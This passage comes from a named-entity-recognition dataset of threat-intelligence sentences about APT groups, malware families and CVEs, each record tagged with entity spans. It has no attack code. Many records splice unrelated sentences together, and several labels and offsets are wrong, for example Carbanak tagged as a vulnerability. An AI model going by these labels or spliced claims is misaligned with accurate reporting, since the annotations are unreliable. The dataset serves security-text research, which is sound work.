While inspecting one of the C&C servers of Miniduke , we have found files that were not related to the C&C code , but seemed to be prepared for infecting visitors using web - based vulnerabilities .", "spans": {"THREAT_ACTOR: APT17": [[187, 192]], "FILEPATH: 195ade342a6a4ea0a58cfbfb43dc64cb": [[195, 227]], "SYSTEM: C&C servers": [[258, 269]], "MALWARE: Miniduke": [[273, 281]]}, "info": {"id": "cyberner_stix_train_006482", "source": "cyberner_stix_train"}} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The interest among hackers in targeting trading systems is expected to grow .", "spans": {"MALWARE: Silence.Downloader": [[17, 35]]}, "info": {"id": "cyberner_stix_train_006483", "source": "cyberner_stix_train"}} {"text": "In this campaign , the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware .", "spans": {"THREAT_ACTOR: MoleRATs": [[109, 117]], "MALWARE: Micropsia": [[132, 141]], "MALWARE: Kaperagent": [[146, 156]]}, "info": {"id": "cyberner_stix_train_006484", "source": "cyberner_stix_train"}} {"text": "While the loader has often been used together with other MiniDuke components , it has also commonly been used in conjunction with CosmicDuke and PinchDuke .", "spans": {"TOOL: loader": [[10, 16]], "MALWARE: MiniDuke": [[57, 65]], "MALWARE: CosmicDuke": [[130, 140]], "MALWARE: PinchDuke": [[145, 154]]}, "info": {"id": "cyberner_stix_train_006485", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "THREAT_ACTOR: Clever Kitten": [[159, 172]], "ORGANIZATION: individual": [[338, 348]], "ORGANIZATION: social engineering": [[382, 400]]}, "info": {"id": "cyberner_stix_train_006486", "source": "cyberner_stix_train"}} {"text": "The PinchDuke information stealer gathers system configuration information , steals user credentials , and collects user files from the compromised host transferring these via HTTP (S ) to a C&C server .", "spans": {"MALWARE: PinchDuke": [[4, 13]], "TOOL: information stealer": [[14, 33]], "TOOL: C&C": [[191, 194]]}, "info": {"id": "cyberner_stix_train_006487", "source": "cyberner_stix_train"}} {"text": "They have extensive checks for the various security software that is installed on the system and their specific configurations .", "spans": {}, "info": {"id": "cyberner_stix_train_006488", "source": "cyberner_stix_train"}} {"text": "Although the applications were never available in Google Play , we immediately identified the scope of the problem by using Verify Apps . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . gaming industry scope attackers asia . 
Significantly , Anonymous Sudan has caused significant disruptions at a level not observed by KillNet affiliates previously .", "spans": {"SYSTEM: Google Play": [[50, 61]], "SYSTEM: Verify Apps": [[124, 135]], "VULNERABILITY: EternalBlue exploit": [[142, 161]], "TOOL: Petya": [[275, 280]], "TOOL: NotPetya": [[283, 291]], "THREAT_ACTOR: Anonymous Sudan": [[362, 377]]}, "info": {"id": "cyberner_stix_train_006489", "source": "cyberner_stix_train"}} {"text": "The size of the botnet however ( about 1400 bots ) is very small if its intended use is for commercial DoS attacks or spam-sending .", "spans": {"TOOL: DoS": [[103, 106]]}, "info": {"id": "cyberner_stix_train_006490", "source": "cyberner_stix_train"}} {"text": "Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . The exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": {"MALWARE: exploit document": [[163, 179]], "TOOL: KeyBoy": [[204, 210]], "MALWARE: decoy document": [[237, 251]], "MALWARE: ELMER": [[452, 457]]}, "info": {"id": "cyberner_stix_train_006491", "source": "cyberner_stix_train"}} {"text": "] infokalisi [ . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization . In these instances they do not need to use a proxy tool like HTRAN to interact with victim systems . 
If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim ’s authentication credentials or cookies with a “ man - in - the - middle \" attack .", "spans": {"ORGANIZATION: Palo Alto Networks WildFire": [[31, 58]], "ORGANIZATION: industrial organization": [[183, 206]], "TOOL: HTRAN": [[270, 275]], "THREAT_ACTOR: the attacker": [[333, 345]]}, "info": {"id": "cyberner_stix_train_006492", "source": "cyberner_stix_train"}} {"text": "Once the file is unpacked , the backdoor is dropped in two different locations on the infected operating system :", "spans": {}, "info": {"id": "cyberner_stix_train_006493", "source": "cyberner_stix_train"}} {"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": {"VULNERABILITY: Carbanak": [[32, 40]], "VULNERABILITY: CVE-2013-3660": [[209, 222]], "ORGANIZATION: Kaspersky": [[258, 267]], "THREAT_ACTOR: ScarCruft": [[284, 293]], "VULNERABILITY: zero-day": [[323, 331]], "VULNERABILITY: CVE-2016-0147": [[334, 347]], "ORGANIZATION: Microsoft": [[369, 378]], "TOOL: XML": [[379, 382]]}, "info": {"id": "cyberner_stix_train_006494", "source": "cyberner_stix_train"}} {"text": "Update and patch production servers regularly .", "spans": {}, "info": {"id": "cyberner_stix_train_006495", "source": "cyberner_stix_train"}} {"text": "That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . 
This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using .", "spans": {"MALWARE: JAR": [[167, 170]], "TOOL: Order_2018.jar": [[231, 245]], "MALWARE: installers": [[285, 295]], "MALWARE: uninstallers": [[298, 310]], "ORGANIZATION: Novetta": [[323, 330]], "THREAT_ACTOR: Lazarus Group": [[348, 361]]}, "info": {"id": "cyberner_stix_train_006496", "source": "cyberner_stix_train"}} {"text": "The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading . NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers . The group has been attributed to the Chinese People ’s Liberation Army ’s ( PLA ) Chengdu Military Region Second Technical Reconnaissance Bureau ( Military Unit Cover Designator 78020 ) .", "spans": {"ORGANIZATION: NTG’s": [[126, 131]], "THREAT_ACTOR: NewsBeef’s": [[170, 180]], "ORGANIZATION: Chinese People ’s Liberation Army ’s": [[302, 338]], "ORGANIZATION: PLA": [[341, 344]], "ORGANIZATION: Chengdu Military Region Second Technical Reconnaissance Bureau": [[347, 409]], "ORGANIZATION: Military Unit Cover Designator 78020": [[412, 448]]}, "info": {"id": "cyberner_stix_train_006497", "source": "cyberner_stix_train"}} {"text": "The client receives and decrypts the packet .", "spans": {}, "info": {"id": "cyberner_stix_train_006498", "source": "cyberner_stix_train"}} {"text": "Special focus will be on the samples that were used in targeted attacks against Ukrainian government organizations earlier this year . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"ORGANIZATION: government organizations": [[90, 114]], "ORGANIZATION: governments": [[272, 283]], "ORGANIZATION: militaries": [[288, 298]], "ORGANIZATION: defense attaches": [[301, 317]], "ORGANIZATION: media entities": [[320, 334]], "ORGANIZATION: dissidents": [[341, 351]], "ORGANIZATION: figures": [[356, 363]], "ORGANIZATION: Russian government": [[387, 405]]}, "info": {"id": "cyberner_stix_train_006499", "source": "cyberner_stix_train"}} {"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . Originally , the main infection vector of Blue Termite was spear-phishing emails .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]], "MALWARE: document files": [[106, 120]], "THREAT_ACTOR: attacker": [[188, 196]], "MALWARE: Blue Termite": [[303, 315]], "TOOL: emails": [[335, 341]]}, "info": {"id": "cyberner_stix_train_006500", "source": "cyberner_stix_train"}} {"text": "List of packages received from the C2 adminNumber : Setup of the admin phone number . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . Upon successful connection , the malware transmits victim information such as : hostname , IP address , Language Pack along with other operating system information . 
• None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"TOOL: DNSMessenger": [[153, 165]], "TOOL: MuddyWater": [[170, 180]], "VULNERABILITY: CVE-2022 - 41080": [[430, 446]], "VULNERABILITY: CVE-2022 - 41082": [[451, 467]]}, "info": {"id": "cyberner_stix_train_006501", "source": "cyberner_stix_train"}} {"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "ORGANIZATION: FireEye Labs": [[32, 44]], "THREAT_ACTOR: Lotus Blossom": [[320, 333]], "ORGANIZATION: individual": [[368, 378]]}, "info": {"id": "cyberner_stix_train_006502", "source": "cyberner_stix_train"}} {"text": "While analyzing hosts compromised by BRONZE PRESIDENT , CTU researchers identified other malware artifacts .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[37, 53]], "ORGANIZATION: CTU": [[56, 59]]}, "info": {"id": "cyberner_stix_train_006504", "source": "cyberner_stix_train"}} {"text": "This group is known for its technique of registering domains that closely resemble domains of legitimate organizations they plan to target .", "spans": {}, "info": {"id": "cyberner_stix_train_006505", "source": "cyberner_stix_train"}} {"text": "backdoor , Sedreco , AZZY , Xagent , ADVSTORESHELL , NETUI .", "spans": {"MALWARE: Sedreco": [[11, 18]], "MALWARE: AZZY": [[21, 25]], "MALWARE: Xagent": [[28, 34]], "MALWARE: ADVSTORESHELL": [[37, 50]], "MALWARE: NETUI": [[53, 58]]}, "info": {"id": "cyberner_stix_train_006506", "source": "cyberner_stix_train"}} {"text": "] Once launched , the app starts to 
communicate with its C & C server ( whose IP address is base64-encoded in the app ) . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Here are the 7 actions that the infected machine can be instructed to perform: Delete a specific file .", "spans": {"ORGANIZATION: Kaspersky": [[122, 131]], "ORGANIZATION: LuckyMouse": [[153, 163]]}, "info": {"id": "cyberner_stix_train_006507", "source": "cyberner_stix_train"}} {"text": "ESET researchers have observed a significant change in the campaign of the infamous espionage group . During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe” with their CARBANAK payload .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: group": [[94, 99]], "ORGANIZATION: Mandiant": [[130, 138]], "THREAT_ACTOR: FIN7": [[153, 157]], "FILEPATH: services.exe”": [[234, 247]], "MALWARE: CARBANAK": [[259, 267]]}, "info": {"id": "cyberner_stix_train_006508", "source": "cyberner_stix_train"}} {"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code .", "spans": {"ORGANIZATION: healthcare": [[172, 182]], "TOOL: Python": [[312, 318]]}, "info": {"id": "cyberner_stix_train_006509", "source": "cyberner_stix_train"}} {"text": "For most of its history it operated as a government department or public corporation . 
Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33’s domain and hosting infrastructure in an effort to identify recent activity . Recently Subaat drew our attention due to renewed targeted attack activity .", "spans": {"ORGANIZATION: Insikt": [[87, 93]], "ORGANIZATION: Recorded Future": [[185, 200]], "THREAT_ACTOR: APT33’s": [[326, 333]], "THREAT_ACTOR: Subaat": [[420, 426]]}, "info": {"id": "cyberner_stix_train_006510", "source": "cyberner_stix_train"}} {"text": "We can’t get hold of the final payload that ’s executed in memory , but we believe its backdoor-type malware is ultimately used to control the infected victim .", "spans": {}, "info": {"id": "cyberner_stix_train_006511", "source": "cyberner_stix_train"}} {"text": "To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"THREAT_ACTOR: FIN7": [[66, 70]], "TOOL: PowerShell script": [[100, 117]], "MALWARE: sdbinst.exe": [[134, 145]], "THREAT_ACTOR: actor’s": [[240, 247]], "TOOL: emails": [[248, 254]], "FILEPATH: malicious payload": [[301, 318]], "ORGANIZATION: users": [[383, 388]]}, "info": {"id": "cyberner_stix_train_006512", "source": "cyberner_stix_train"}} {"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . 
Perhaps it also points to the suspected North Korean origin of attack .", "spans": {"THREAT_ACTOR: group": [[5, 10]]}, "info": {"id": "cyberner_stix_train_006513", "source": "cyberner_stix_train"}} {"text": "The second attack vector , the overlay attack , shows a customized phishing window whenever a targeted application is started on the device . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege . This file contains a list of IP addresses for the infected machine to connect back to . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": {"TOOL: PLEAD": [[148, 153]], "TOOL: KIVARS": [[158, 164]], "VULNERABILITY: a gap in the implementation of CSP , and even for sites that do use it correctly": [[451, 531]]}, "info": {"id": "cyberner_stix_train_006514", "source": "cyberner_stix_train"}} {"text": "On the other hand , the network traffic generated by the .NET version is unencoded .", "spans": {"TOOL: .NET": [[57, 61]]}, "info": {"id": "cyberner_stix_train_006515", "source": "cyberner_stix_train"}} {"text": "Here are some of the most notable : ‘ geofence ’ – this command adds a specified location to the implant ’ s internal database and when it matches a device ’ s current location the malware triggers and begins to record surrounding audio . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . 
The group 's victims are mainly in the telecommunications , government ( IT services ) , and oil sectors .", "spans": {"THREAT_ACTOR: NewsBeef's": [[365, 375]], "ORGANIZATION: telecommunications": [[425, 443]], "ORGANIZATION: government": [[446, 456]], "ORGANIZATION: IT services": [[459, 470]], "ORGANIZATION: oil sectors": [[479, 490]]}, "info": {"id": "cyberner_stix_train_006516", "source": "cyberner_stix_train"}} {"text": "Conclusion Threats are better prevented than cured , so do not follow suspicious links in SMS , and be sure to install apps only from official sources and check what permissions you are granting during installation . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . The library is only used to perform keylogging and clipboard stealing .", "spans": {"ORGANIZATION: Microstep Intelligence Bureau": [[236, 265]], "ORGANIZATION: Ukrainian government": [[317, 337]], "THREAT_ACTOR: Gamaredon": [[365, 374]]}, "info": {"id": "cyberner_stix_train_006517", "source": "cyberner_stix_train"}} {"text": "b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 . 
Cybereason suspects this These ransom demands are significantly lower than those made by many well - known ransomware gangs like RYUK , Babuk , REvil , Conti , DarkSide , BlackMatter , BlackCat , and Yanluowang , which are typically in the millions of dollars .", "spans": {"ORGANIZATION: FireEye": [[260, 267]], "TOOL: TRITON": [[364, 370]], "TOOL: TRITON/TRISIS malware": [[408, 429]], "ORGANIZATION: Cybereason": [[450, 460]], "MALWARE: RYUK": [[579, 583]], "MALWARE: Babuk": [[586, 591]], "MALWARE: REvil": [[594, 599]], "MALWARE: Conti": [[602, 607]], "MALWARE: DarkSide": [[610, 618]], "MALWARE: BlackMatter": [[621, 632]], "MALWARE: BlackCat": [[635, 643]], "MALWARE: Yanluowang": [[650, 660]]}, "info": {"id": "cyberner_stix_train_006518", "source": "cyberner_stix_train"}} {"text": "But in terms of features and behaviors , these two malware are very similar .", "spans": {}, "info": {"id": "cyberner_stix_train_006519", "source": "cyberner_stix_train"}} {"text": "File Name : ati.exe .", "spans": {"FILEPATH: ati.exe": [[12, 19]]}, "info": {"id": "cyberner_stix_train_006520", "source": "cyberner_stix_train"}} {"text": "The emergence of XLoader 6.0 does not only indicate that the threat actors behind it remain active ; it also holds fresh evidence of its connection to FakeSpy . The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism . In the latter case, the P action is passed as one of the parameters to AdrGen and the query is made for an A resource record using the [System.Net.Dns]::GetHostAddresses . 
The campaigns contain malicious web links and attachments that infect users machines with malware when opened .", "spans": {"MALWARE: XLoader 6.0": [[17, 28]], "MALWARE: FakeSpy": [[151, 158]], "THREAT_ACTOR: Wekby group": [[185, 196]], "TOOL: HTTPBrowser malware family": [[213, 239]]}, "info": {"id": "cyberner_stix_train_006521", "source": "cyberner_stix_train"}} {"text": "Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 .", "spans": {"VULNERABILITY: Carbanak": [[38, 46]], "THREAT_ACTOR: attackers": [[47, 56]], "THREAT_ACTOR: VENOMOUS BEAR": [[172, 185]]}, "info": {"id": "cyberner_stix_train_006522", "source": "cyberner_stix_train"}} {"text": "In addition to often embedding persistence or privilege escalation components , CosmicDuke has occasionally embedded PinchDuke , GeminiDuke , or MiniDuke components .", "spans": {"MALWARE: CosmicDuke": [[80, 90]], "MALWARE: PinchDuke": [[117, 126]], "MALWARE: GeminiDuke": [[129, 139]], "MALWARE: MiniDuke": [[145, 153]]}, "info": {"id": "cyberner_stix_train_006523", "source": "cyberner_stix_train"}} {"text": "That creates a fake ID that allows the perpetrators to generate referral revenues . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . Stonedrill ( Trojan.Stonedrill ) : Custom malware capable of opening a backdoor on an infected computer and downloading additional files . 
NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": {"TOOL: wipers": [[126, 132]], "MALWARE: Stonedrill": [[227, 237]], "MALWARE: Trojan.Stonedrill": [[240, 257]], "MALWARE: NoEscape": [[366, 374]]}, "info": {"id": "cyberner_stix_train_006524", "source": "cyberner_stix_train"}} {"text": "RuMMS samples , hosting sites , C2 servers from Jan. 2016 to Mar . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email . If a serial number exists , the rest of the code is executed . CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"MALWARE: RuMMS": [[0, 5]], "THREAT_ACTOR: OilRig": [[77, 83]], "TOOL: OopsIE Trojan": [[118, 131]], "ORGANIZATION: CrowdStrike security researchers": [[273, 305]], "THREAT_ACTOR: Play ransomware attacks": [[433, 456]]}, "info": {"id": "cyberner_stix_train_006525", "source": "cyberner_stix_train"}} {"text": "The macro then decodes a PowerShell script which downloads base64 encoded content from the pastebin url .", "spans": {"TOOL: macro": [[4, 9]], "TOOL: PowerShell": [[25, 35]], "TOOL: base64 encoded content": [[59, 81]], "TOOL: pastebin": [[91, 99]]}, "info": {"id": "cyberner_stix_train_006526", "source": "cyberner_stix_train"}} {"text": "We do not know exactly how many people have been infected with RuMMS malware . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . Brief Description : SFX Archive First Stage . 
In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": {"MALWARE: RuMMS": [[63, 68]], "ORGANIZATION: Kaspersky": [[102, 111]], "THREAT_ACTOR: Hack520": [[426, 433]], "THREAT_ACTOR: Winnti": [[467, 473]]}, "info": {"id": "cyberner_stix_train_006528", "source": "cyberner_stix_train"}} {"text": "We have observed these actors using Tor or proxy-based tools similar to Tor (e.g , UltraSurf , as seen in Figure 2) . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": {"THREAT_ACTOR: actors": [[23, 29]], "TOOL: Tor": [[36, 39]], "TOOL: proxy-based tools": [[43, 60]], "THREAT_ACTOR: COBALT GYPSY": [[118, 130]], "ORGANIZATION: telecommunications": [[164, 182]], "ORGANIZATION: government": [[185, 195]], "ORGANIZATION: defense": [[198, 205]], "ORGANIZATION: oil": [[208, 211]], "ORGANIZATION: financial services organizations": [[218, 250]], "ORGANIZATION: individual victims": [[309, 327]], "ORGANIZATION: social media": [[336, 348]]}, "info": {"id": "cyberner_stix_train_006529", "source": "cyberner_stix_train"}} {"text": "DHS and FBI recommend that network administrators review the IP S-PROT addresses , file hashes , network signatures , and YARA rules provided , and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]], "TOOL: IP S-PROT addresses": [[61, 80]], "TOOL: file hashes": [[83, 94]], "TOOL: network signatures": [[97, 115]], "TOOL: YARA": [[122, 126]], "TOOL: IPs": [[156, 159]]}, "info": {"id": "cyberner_stix_train_006530", "source": "cyberner_stix_train"}} {"text": "non-Google Play ) app stores which often have fewer security and vetting procedures for the 
apps they host . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals .", "spans": {"SYSTEM: Play": [[11, 15]], "THREAT_ACTOR: APT41": [[109, 114]], "TOOL: ADORE.XSEC": [[125, 135]], "THREAT_ACTOR: APT33": [[269, 274]], "ORGANIZATION: oil refining": [[326, 338]], "ORGANIZATION: petrochemicals": [[343, 357]]}, "info": {"id": "cyberner_stix_train_006531", "source": "cyberner_stix_train"}} {"text": "Method doInBackground : to send information to remote C2 server As seen from the major code body of method doInBackground shown in Figure 3 ( some of the original classes and methods are renamed for easier understanding ) , there are three calls to HttpPost with different contents as parameters . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . Gamaredon : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a . 
The term has been around since the 1990s , and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices .", "spans": {"THREAT_ACTOR: group": [[318, 323]], "ORGANIZATION: telecommunications": [[459, 477]], "ORGANIZATION: defense industries": [[482, 500]], "THREAT_ACTOR: Gamaredon": [[503, 512]], "FILEPATH: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[515, 579]]}, "info": {"id": "cyberner_stix_train_006532", "source": "cyberner_stix_train"}} {"text": "They can be configured to block data and applications from certain locations ( IP S-PROT whitelisting ) , while allowing relevant and necessary data through .", "spans": {"TOOL: IP S-PROT whitelisting": [[79, 101]]}, "info": {"id": "cyberner_stix_train_006533", "source": "cyberner_stix_train"}} {"text": "These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor .", "spans": {"ORGANIZATION: Sumitomo Electric": [[189, 206]], "THREAT_ACTOR: Winnti": [[209, 215]], "THREAT_ACTOR: APT16": [[328, 333]], "ORGANIZATION: government agency": [[374, 391]], "MALWARE: ELMER backdoor": [[474, 488]]}, "info": {"id": "cyberner_stix_train_006534", "source": "cyberner_stix_train"}} {"text": "Everyday users can do the same by checking the router ’ s DNS settings if they ’ ve been modified . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . 
While the name ‘ Winnti ’ in public reporting was previously used tosignify a single actor , pronounced divergence in targeting and tradecraft betweencampaigns has led industry consensus to break up the tracking of the continued use ofthe Winnti malware under different actor clusters .", "spans": {"THREAT_ACTOR: Lazarus": [[100, 107]], "MALWARE: Winnti": [[191, 197], [413, 419]]}, "info": {"id": "cyberner_stix_train_006535", "source": "cyberner_stix_train"}} {"text": "By the end of that month , CosmicDuke samples we found that had been compiled on the 30th of July had shed unused parts of their code that had essentially just been relics of the past .", "spans": {"MALWARE: CosmicDuke": [[27, 37]]}, "info": {"id": "cyberner_stix_train_006536", "source": "cyberner_stix_train"}} {"text": "Before doing this , the malware makes a screenshot of the screen and displays it on top of all other windows for few seconds . They then proceeded to log directly into the VPN using the credentials of the compromised user . The decrypted payload undergoes one final transformation , where it is XORed with the first byte read from the C:\\Windows\\system . ini file , which is expected to begin with a comment character \" ; \" ( 0x3B ) . Curl An opensource commandline tool for transferring data using various network protocols .", "spans": {"SYSTEM: windows": [[101, 108]], "TOOL: credentials of the compromised user": [[186, 221]], "TOOL: Curl": [[435, 439]]}, "info": {"id": "cyberner_stix_train_006537", "source": "cyberner_stix_train"}} {"text": "These samples were identified as being the work of one group , referred to in this document as \" Quedagh \" , which has a history of targeting political organizations . 
In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"THREAT_ACTOR: group": [[55, 60]], "THREAT_ACTOR: Quedagh": [[97, 104]], "ORGANIZATION: political organizations": [[142, 165]], "ORGANIZATION: social engineering": [[178, 196]], "THREAT_ACTOR: actor": [[226, 231]], "ORGANIZATION: diaspora": [[310, 318]], "ORGANIZATION: government employees": [[343, 363]]}, "info": {"id": "cyberner_stix_train_006538", "source": "cyberner_stix_train"}} {"text": "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation . Winnti : nw.infestexe.com 138.68.14.195 DigitalOcean . While there are several motivations for hackers , we ve covered 6 of the most common ones in this article", "spans": {"THREAT_ACTOR: APT40": [[286, 291]], "THREAT_ACTOR: Winnti": [[349, 355]], "DOMAIN: nw.infestexe.com": [[358, 374]], "IP_ADDRESS: 138.68.14.195": [[375, 388]], "ORGANIZATION: DigitalOcean": [[389, 401]], "THREAT_ACTOR: hackers": [[444, 451]]}, "info": {"id": "cyberner_stix_train_006539", "source": "cyberner_stix_train"}} {"text": "At times , the use of this malware testing environment correlates to in-network activities of TEMP.Veles , demonstrating direct operational support for intrusion activity .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[94, 104]]}, "info": {"id": "cyberner_stix_train_006540", "source": "cyberner_stix_train"}} {"text": "AOSP patched the Janus vulnerability since version 7 by introducing APK Signature Scheme V2 . 
Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Besides tracking the files and processes that Dexphot uses to execute an attack , we have also been monitoring the domains used to host malicious payloads . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": {"VULNERABILITY: Janus": [[17, 22]], "THREAT_ACTOR: Patchwork": [[106, 115]], "VULNERABILITY: CVE-2015-1641": [[285, 298]], "VULNERABILITY: CVE-2017-11882": [[303, 317]], "MALWARE: Dexphot": [[366, 373]], "SYSTEM: a separate environment": [[496, 518]], "THREAT_ACTOR: a threat actor": [[533, 547]], "VULNERABILITY: the vulnerable Exchange Server": [[619, 649]]}, "info": {"id": "cyberner_stix_train_006541", "source": "cyberner_stix_train"}} {"text": "The sample has a multicomponent structure and can download a payload or updates from its C & C server , which happens to be an FTP server belonging to the free Russian web hosting service Ucoz . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . The recipient clicked the link and proceeded to download and open a malicious HTML executable file , which in turn loaded content from a C&C server via an embedded iframe . 
